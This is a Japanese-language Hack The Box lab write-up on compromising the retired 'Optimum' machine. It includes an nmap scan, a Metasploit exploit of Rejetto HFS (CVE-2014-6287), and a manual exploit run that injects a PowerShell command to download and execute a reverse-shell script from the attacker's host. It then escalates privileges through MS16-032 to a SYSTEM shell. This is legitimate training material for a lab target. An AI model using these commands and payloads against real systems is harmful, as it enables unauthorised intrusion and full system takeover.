Zenn
😎

Optimum_HTB

2023/12/31に公開
#
hack
#
htb
#
optimum
tech

概要

  • Optimum は、既知のエクスプロイトを持つサービスの列挙に主に焦点を当てた初心者レベルのマシンです。 どちらのエクスプロイトも簡単に入手でき、Metasploit モジュールが関連付けられています。

SCAN

┌──(kali㉿kali)-[~/Optimum]
└─$ nmap -T4 -Pn -sV -sC 10.10.10.8        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-29 06:01 EST
Nmap scan report for 10.10.10.8
Host is up (0.25s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.89 seconds

Initial Access

  • 公式Write Up 通りにとりあえずmsfconsoleで刺してみる。
msf6 > search cve:2014-6287

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution     


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec

msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8rhost => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.16.2lhost => 10.10.16.2
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.2:4444 
[*] Using URL: http://10.10.16.2:8080/ItO77Cfstcbu
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /ItO77Cfstcbu
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\uFrIskMYSOxH.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.2:4444 
[*] Using URL: http://10.10.16.2:8080/ikwLnccTo
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /ikwLnccTo
[*] Sending stage (175686 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\DlvjNW.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.10.10.8:49167) at 2023-12-28 23:31:32 -0500
[*] Server stopped.

meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter >
  • 2回刺したら刺さった。
    • 1回目の失敗原因は不明

これ以降うまくいかないのでやり直す

Initial Access

Invoke-PowerShellTcp.ps1を使用したReverseShell

  1. Invoke-PowerShellTcp.ps1
  • このフォルダ上でpython待ち受け
    • python3 -m http.server 8080
  1. 別ターミナルでnc待ち受け
┌──(kali㉿kali)-[~/Optimum]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
  1. 更に別ターミナルで脆弱性に使用できる49125.pyを使用
  • 32bitで動いていることを確認したので32bitを対策する。
┌──(kali㉿kali)-[~/Optimum]
└─$ python3 49125.py 10.10.10.8 80 "C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe iex(new-object net.webclient).downloadstring('http://10.10.16.4:8080/Invoke-PowerShellTcp.ps1')"
http://10.10.10.8:80/?search=%00{.+exec|C%3A%5CWINDOWS%5CSysnative%5CWindowsPowerShell%5Cv1.0%5Cpowershell.exe%20iex%28new-object%20net.webclient%29.downloadstring%28%27http%3A//10.10.16.4%3A8080/Invoke-PowerShellTcp.ps1%27%29.}

権限昇格

  1. Sherlock.ps1を使用した使用した脆弱性確認
  • 全てを確認したいので追記
    echo "Find-AllVulns" >> Sherlock.ps1
  • 待ち受け
    python3 -m http.server 8080
  1. 実行
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.16.2:8080/Sherlock.ps1')


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable



PS C:\Users\kostas\Desktop>

Invoke-MS16032.ps1

  • Invoke-MS16032.ps1を利用してSystem権限取得する。
# Invoke-MS16032.ps1があるディレクトリで待ち受け
┌──(kali㉿kali)-[~/Optimum/oscp_notes/MS16-032 drivers eop]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) 
# Invoke-PowerShellTcp.ps1の中身をリバースシェルとは違うportに書き換えて待ち受け
┌──(kali㉿kali)-[~/Optimum/nishang/Shells]
└─$ python3 -m http.server 3434
Serving HTTP on 0.0.0.0 port 3434 (http://0.0.0.0:3434/) ...
# リバースシェルを取ったターミナル
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.16.4:8080/Invoke-MS16032.ps1')
     __ __ ___ ___   ___     ___ ___ ___ 
    |  V  |  _|_  | |  _|___|   |_  |_  |
    |     |_  |_| |_| . |___| | |_  |  _|
    |_|_|_|___|_____|___|   |___|___|___|
                                        
                   [by b33f -> @FuzzySec]

[!] Holy handle leak Batman, we have a SYSTEM shell!!
## 待ち受けリバースシェル
```bash
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.8] 49183
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
nt authority\system

流れのおさらい

Discussion